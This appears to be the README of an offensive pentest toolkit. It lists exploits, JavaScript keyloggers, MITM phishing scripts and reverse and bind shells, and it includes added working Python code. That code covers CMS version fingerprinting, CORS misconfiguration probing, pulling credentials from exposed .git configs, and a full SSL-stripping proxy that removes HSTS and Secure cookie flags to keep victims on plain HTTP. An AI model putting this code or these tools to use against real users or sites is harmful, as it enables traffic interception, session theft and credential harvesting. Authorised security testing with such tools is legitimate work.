LA FOIR'FOUILLE
Tools and more... The list below is not maintained.
FINGERPRINT
haveibeenpwned.sh - Takes a list of e-mail addresses as input and checks their pwned status on https://haveibeenpwned.com/.
web/pillage.sh
Finds interesting files on a system through an LFI previously found on the target.
web/versionchecker.sh
versionchecker.sh hashes the input files and compares the hashes with those computed from the same files in specific git releases (tags). It helps to identify, for example, a CMS version when files such as CHANGELOG.txt have been removed.
Example of command:
./versionchecker.sh -s ./input -g ~/Documents/repo/drupal/ -p "^[78]\.[0-9.]+$"
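The matching logic behind that command, as an added Python example (not the versionchecker.sh script itself): every release tag of a local clone is indexed by the sha256 of a handful of files, and the hashes of the copies fetched from the target are scored against each release. The git helpers assume a clone and git on PATH; the SAMPLE_INDEX and SAMPLE_OBSERVED values are constructed (not real Drupal hashes) so the scoring runs offline.

```python
import hashlib
import re
import subprocess
from typing import Dict, List, Optional, Tuple


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def release_tags(repo: str, pattern: str) -> List[str]:
    """Tags of the local clone at `repo` whose name matches `pattern`
    (e.g. "^[78]\\.[0-9.]+$" for Drupal 7.x/8.x). Needs git on PATH."""
    out = subprocess.run(["git", "-C", repo, "tag", "--list"],
                         capture_output=True, text=True, check=True).stdout
    rx = re.compile(pattern)
    return [t for t in out.split() if rx.match(t)]


def hash_file_at_tag(repo: str, tag: str, path: str) -> Optional[str]:
    """sha256 of `path` as committed in release `tag`; None if the file is absent there."""
    r = subprocess.run(["git", "-C", repo, "show", f"{tag}:{path}"], capture_output=True)
    return sha256_bytes(r.stdout) if r.returncode == 0 else None


def build_release_index(repo: str, tags: List[str], paths: List[str]) -> Dict[str, Dict[str, str]]:
    """{tag: {path: sha256}} for every release: the reference the target is compared with."""
    index: Dict[str, Dict[str, str]] = {}
    for tag in tags:
        hashes = {}
        for p in paths:
            h = hash_file_at_tag(repo, tag, p)
            if h is not None:
                hashes[p] = h
        index[tag] = hashes
    return index


def rank_versions(observed: Dict[str, str], index: Dict[str, Dict[str, str]]) -> List[Tuple[str, int, int]]:
    """Rank releases by evidence. `observed` maps a path to the sha256 of the copy
    fetched from the target. A file missing from a release is no evidence either way;
    a file present with a different hash counts against that release."""
    ranked = []
    for tag, hashes in index.items():
        matches = mismatches = 0
        for path, h in observed.items():
            if path not in hashes:
                continue
            if hashes[path] == h:
                matches += 1
            else:
                mismatches += 1
        ranked.append((tag, matches, mismatches))
    ranked.sort(key=lambda t: (-t[1], t[2], t[0]))   # most matches, then fewest contradictions
    return ranked


def consistent_versions(observed: Dict[str, str], index: Dict[str, Dict[str, str]]) -> List[str]:
    """Releases that match at least one observed file and contradict none.
    Several survivors mean the chosen files are identical across those releases:
    fetch a file that changed between them and re-run."""
    return [tag for tag, m, mm in rank_versions(observed, index) if m > 0 and mm == 0]


# Constructed reference index and "target" hashes so the scoring can be exercised without a clone.
_v70_js, _v71_js, _css = b"Drupal.js 7.0", b"Drupal.js 7.1", b"system.css"
SAMPLE_INDEX = {
    "7.0":   {"misc/drupal.js": sha256_bytes(_v70_js), "modules/system/system.css": sha256_bytes(_css)},
    "7.1":   {"misc/drupal.js": sha256_bytes(_v71_js), "modules/system/system.css": sha256_bytes(_css)},
    "8.0.0": {"core/misc/drupal.js": sha256_bytes(b"Drupal.js 8")},
}
SAMPLE_OBSERVED = {"misc/drupal.js": sha256_bytes(_v71_js),
                   "modules/system/system.css": sha256_bytes(_css)}

if __name__ == "__main__":
    for tag, m, mm in rank_versions(SAMPLE_OBSERVED, SAMPLE_INDEX):
        print(f"{tag:8} matches={m} mismatches={mm}")
    print("consistent:", consistent_versions(SAMPLE_OBSERVED, SAMPLE_INDEX))
```

Pick files that change often between releases (minified JS, CSS, install scripts) rather than licence or README files; a file shared unchanged by every release adds a match to all of them and discriminates nothing.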
web/knocktone/knocktone.py
- Converts a knockpy JSON output file for aquatone-scan
- Resolves DNS names and flags unresolved aliases (CNAMEs whose target no longer resolves)
- Generates a subdomain list
- Scans the headers produced by aquatone-scan
- and much more...
- Install: pip install -r requirements.txt
web/cors/cors.py
- Multi-threaded script looking for permissive CORS configurations, taking a list of URLs or domains as input
Example of command:
cors.py -f urls.txt
Update 03/07/2020: everything has been merged into https://github.com/chenjj/CORScanner.git
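What "permissive CORS" means in practice, as an added Python example (not cors.py or CORScanner code): each URL is requested once per crafted Origin, and the Access-Control-Allow-Origin / -Credentials headers of the answer are judged. The attacker origin https://evil.example and the probe labels are assumptions; the network part uses only urllib, and classify() is pure so it can be checked offline.

```python
import urllib.error
import urllib.request
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

ATTACKER = "https://evil.example"   # assumed attacker-controlled origin


def candidate_origins(url: str) -> Dict[str, str]:
    """Origins that badly written allow-lists tend to accept (constructed probe set)."""
    p = urlparse(url)
    host, scheme = p.hostname, p.scheme
    return {
        "arbitrary": ATTACKER,                           # server reflects anything
        "null":      "null",                             # sandboxed iframes / data: URLs send Origin: null
        "prefix":    f"{scheme}://{host}.evil.example",  # regex anchored at the start only
        "suffix":    f"{scheme}://evil{host}",           # endswith(host) without a leading dot
        "subdomain": f"{scheme}://attacker.{host}",      # any subdomain trusted: one subdomain XSS suffices
        "http":      f"http://{host}",                   # own origin trusted over plain HTTP (MITM)
    }


def classify(origin_sent: str, acao: Optional[str], acac: Optional[str]) -> Optional[str]:
    """Judge one response to a request that carried `Origin: origin_sent`.
    acao / acac are the Access-Control-Allow-Origin / -Credentials values (None if absent)."""
    if acao is None:
        return None
    if acao.strip() == "*":
        return "wildcard"            # readable cross-origin, but browsers refuse credentials with "*"
    if acao.strip() != origin_sent:
        return None                  # the allow-list held for this origin
    creds = (acac or "").strip().lower() == "true"
    return "reflected+credentials" if creds else "reflected"


def probe(url: str, timeout: float = 10) -> List[Tuple[str, str, str]]:
    """Send one request per candidate origin; return (label, origin, verdict) for hits."""
    findings = []
    for label, origin in candidate_origins(url).items():
        req = urllib.request.Request(url, headers={"Origin": origin, "User-Agent": "cors-probe"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                headers = resp.headers
        except urllib.error.HTTPError as e:
            headers = e.headers      # 4xx/5xx answers still carry CORS headers
        except Exception:
            continue                 # DNS/TLS/timeout: nothing to judge
        verdict = classify(origin, headers.get("Access-Control-Allow-Origin"),
                           headers.get("Access-Control-Allow-Credentials"))
        if verdict:
            findings.append((label, origin, verdict))
    return findings


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:
        for label, origin, verdict in probe(target):
            print(f"{target}  [{label}] Origin: {origin} -> {verdict}")
```

"reflected+credentials" on an endpoint that returns per-user data is the case worth a report: any page on the reflected origin can read the victim's authenticated response. A plain "reflected" without credentials still matters when the endpoint is protected only by network position rather than cookies, and the verdict must be confirmed with the session cookie the victim would actually send, because many applications only emit the headers once authenticated.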
git.sh
- Small bash script providing the following information about a web-exposed git repository (even when directory listing is disabled):
- Dates of the last commits on each branch
- Highlights whether directory listing is enabled
- Highlights whether the remote URL can be accessed (may leak credentials embedded in the URL, e.g. user:password@host)
- Displays the .git/config file and the root .gitignore
Example of command:
git.sh -u http://monsite.com/.git/
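How the checks above are done without directory listing, as an added Python example (not git.sh itself): known paths under .git/ are fetched directly, the remote URL is pulled out of .git/config and inspected for embedded credentials, and the commit date of a branch is read by following refs/heads/<branch> to its loose object and decompressing it. The URL layout and sample data are assumptions; SAMPLE_CONFIG and SAMPLE_COMMIT_OBJECT are constructed so the parsers run offline.

```python
import datetime
import re
import urllib.request
import zlib
from typing import Dict, Optional, Tuple


def fetch(base: str, path: str, timeout: float = 10) -> Optional[bytes]:
    """GET <base>/<path>, where base is the exposed .git/ URL; None on any failure."""
    try:
        with urllib.request.urlopen(base.rstrip("/") + "/" + path, timeout=timeout) as r:
            return r.read()
    except Exception:
        return None


def has_directory_listing(base: str) -> bool:
    """True when GET .git/ returns an index page that lists the refs/ entry."""
    body = fetch(base, "")
    return body is not None and b"refs/" in body


def remotes_from_config(config_text: str) -> Dict[str, str]:
    """{remote name: url} parsed from a .git/config."""
    remotes: Dict[str, str] = {}
    current = None
    for line in config_text.splitlines():
        line = line.strip()
        m = re.match(r'\[remote "([^"]+)"\]', line)
        if m:
            current = m.group(1)
            continue
        if line.startswith("["):
            current = None               # left the [remote "..."] section
            continue
        if current and line.startswith("url"):
            remotes[current] = line.split("=", 1)[1].strip()
    return remotes


def embedded_credentials(url: str) -> Optional[Tuple[str, str]]:
    """(user, password) when an http(s) remote URL embeds them, else None."""
    m = re.match(r"https?://([^:/@]+):([^@/]+)@", url)
    return (m.group(1), m.group(2)) if m else None


def parse_commit_object(blob: bytes) -> Optional[Tuple[str, datetime.datetime]]:
    """Decompress a loose object; for a commit return (committer name, UTC datetime)."""
    raw = zlib.decompress(blob)
    header, _, body = raw.partition(b"\0")   # "commit <len>\0" then the headers
    if not header.startswith(b"commit "):
        return None
    for line in body.split(b"\n"):
        if not line:
            break                             # blank line: the message follows, no more headers
        m = re.match(rb"committer (.+?) <[^>]*> (\d+) [+-]\d{4}$", line)
        if m:
            when = datetime.datetime.fromtimestamp(int(m.group(2)), datetime.timezone.utc)
            return m.group(1).decode("utf-8", "replace"), when
    return None


def branch_last_commit(base: str, branch: str) -> Optional[Tuple[str, datetime.datetime]]:
    """Committer and date of the tip of refs/heads/<branch>. Returns None when the ref
    lives only in packed-refs or the commit only in a packfile (then fetch those instead)."""
    sha = fetch(base, f"refs/heads/{branch}")
    if not sha:
        return None
    sha = sha.decode().strip()
    blob = fetch(base, f"objects/{sha[:2]}/{sha[2:]}")
    return parse_commit_object(blob) if blob else None


# Constructed samples (not from any real repository) so the parsers can be checked offline.
SAMPLE_CONFIG = (
    "[core]\n\trepositoryformatversion = 0\n"
    '[remote "origin"]\n'
    "\turl = https://deploy:s3cret@git.example.com/acme/app.git\n"
    "\tfetch = +refs/heads/*:refs/remotes/origin/*\n"
)
_commit_body = (
    b"tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\n"
    b"author Jane Doe <jane@example.com> 1600000000 +0000\n"
    b"committer Jane Doe <jane@example.com> 1600000000 +0000\n"
    b"\nconstructed commit\n"
)
SAMPLE_COMMIT_OBJECT = zlib.compress(b"commit %d\0" % len(_commit_body) + _commit_body)
```

Branch names come from .git/HEAD, .git/packed-refs and .git/logs/ when there is no listing; a 200 on .git/config or .git/HEAD is already enough to call the repository exposed, and the next step in a real engagement is dumping the object store rather than reading commits one by one.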
PRIVILEGE ESCALATION
- windows/privesc.bat - Dirty script for Windows using accesschk.exe (must be uploaded alongside it; see Sysinternals).
- windows/wmic_info.bat - Same, using the WMI command-line utility (wmic).
- windows/win_user_add.c - Adds a user to the local Administrators group.
EXPLOITS
- egg_hunter.c - An 18-byte egg-hunter shellcode (https://www.exploit-db.com/exploits/41909/)
- rce_phpmailer_exim.py - Linux reverse-shell exploit for PHPMailer < 5.2.20, SwiftMailer <= 5.4.5-DEV and zend-mail < 2.4.11 when the MTA is Exim
- js_keylogger/keylogger.js - JavaScript keylogger, useful once an XSS is found or when poisoning the browser cache during a MITM
- js_keylogger/formscapture.js - Sets a callback on the submit event of every form
NETWORK
- mitm/phishing.sh - Launches a MITM attack and redirects a specific domain to our phishing web page.
- mitm.sh (with mitmproxy) - has its own repo
A custom proxy that strips all HTTPS links from web pages and keeps the victim on an insecure connection with the proxy: VICTIM <-- HTTP --> MITMPROXY <-- HTTPS --> WEBSITE.
It works against any website with at least one page the victim's browser actually loads over plain HTTP; such a load means HSTS is not in effect for that domain in that browser (no preload entry, no cached max-age), so nothing forces the following requests back to HTTPS.
You can inspect and modify the traffic however you want with custom Python scripts.
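The three rewrites such a proxy has to do, as an added Python example (not the mitm.sh repository's own code): downgrade https:// links in response bodies while remembering the host, remove the headers that would send the browser back to TLS (HSTS, https Location, the Secure cookie flag), and fetch upstream over HTTPS for hosts that were downgraded so the site never notices. The class is framework-agnostic; the hook names a mitmproxy addon would call it from are left out, and the traffic in demo() is constructed.

```python
import re
from typing import Dict, Set
from urllib.parse import urlsplit


class SslStripper:
    """Bookkeeping for an HTTPS-stripping proxy. The victim's side stays HTTP; for hosts
    whose links were rewritten the proxy speaks HTTPS upstream, so the site sees a normal TLS client."""

    LINK_RX = re.compile(r'https://([A-Za-z0-9.-]+(?::\d+)?)(/[^\s"\'<>]*)?', re.I)

    def __init__(self) -> None:
        self.stripped_hosts: Set[str] = set()

    def rewrite_body(self, body: str) -> str:
        """Downgrade every absolute https:// link and remember its host."""
        def downgrade(m):
            self.stripped_hosts.add(m.group(1).lower())
            return "http://" + m.group(1) + (m.group(2) or "")
        return self.LINK_RX.sub(downgrade, body)

    def rewrite_response_headers(self, headers: Dict[str, str]) -> Dict[str, str]:
        """Drop HSTS, downgrade https redirects, and clear the Secure flag so the
        browser keeps sending the session cookie over the stripped HTTP connection."""
        out: Dict[str, str] = {}
        for name, value in headers.items():
            key = name.lower()
            if key == "strict-transport-security":
                continue                                   # the victim must never learn HSTS
            if key == "location" and value.lower().startswith("https://"):
                self.stripped_hosts.add(urlsplit(value).netloc.lower())
                value = "http://" + value[len("https://"):]
            elif key == "set-cookie":
                value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.I)
            out[name] = value
        return out

    def upstream_url(self, request_url: str) -> str:
        """The victim asked for http://host/...; if that host was downgraded, go upstream over HTTPS."""
        parts = urlsplit(request_url)
        if parts.scheme == "http" and parts.netloc.lower() in self.stripped_hosts:
            return "https://" + request_url[len("http://"):]
        return request_url


def demo() -> Dict[str, str]:
    """One constructed round trip: a page with an https link, then the headers of the next answer."""
    s = SslStripper()
    page = s.rewrite_body('<a href="https://bank.example/login">Log in</a>')
    hdrs = s.rewrite_response_headers({
        "Strict-Transport-Security": "max-age=31536000",
        "Location": "https://bank.example/home",
        "Set-Cookie": "sid=1; Secure; HttpOnly",
    })
    return {
        "page": page,
        "location": hdrs.get("Location", ""),
        "cookie": hdrs.get("Set-Cookie", ""),
        "hsts_present": str("Strict-Transport-Security" in hdrs),
        "upstream": s.upstream_url("http://bank.example/login"),
        "untouched": s.upstream_url("http://other.example/"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:13} {v}")
```

The limits follow from the design: a domain on the HSTS preload list, or one whose max-age the browser already cached, is never requested over HTTP in the first place, so there is no insecure request to keep; and links built by JavaScript at runtime or set via Content-Security-Policy upgrade-insecure-requests escape a body rewrite, which is why the original script's test for "at least one insecure page" is the right precondition.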
DEV
- urls/uniqurls.py - keeps only unique URLs (for each FQDN, the unique combinations of GET parameters)
- bruteforce/java/
- bruteforce/javascript/ - Bruteforce algorithms with permutations and fixed position characters.
- shell/lin_shell_bind_tcp.c - /bin/sh TCP bind shell.
- shell/lin_reverse_tcp_shell.c - /bin/sh TCP reverse shell.
- shell/uid_gid_root_shell.c - setreuid/setregid root /bin/sh shell.
...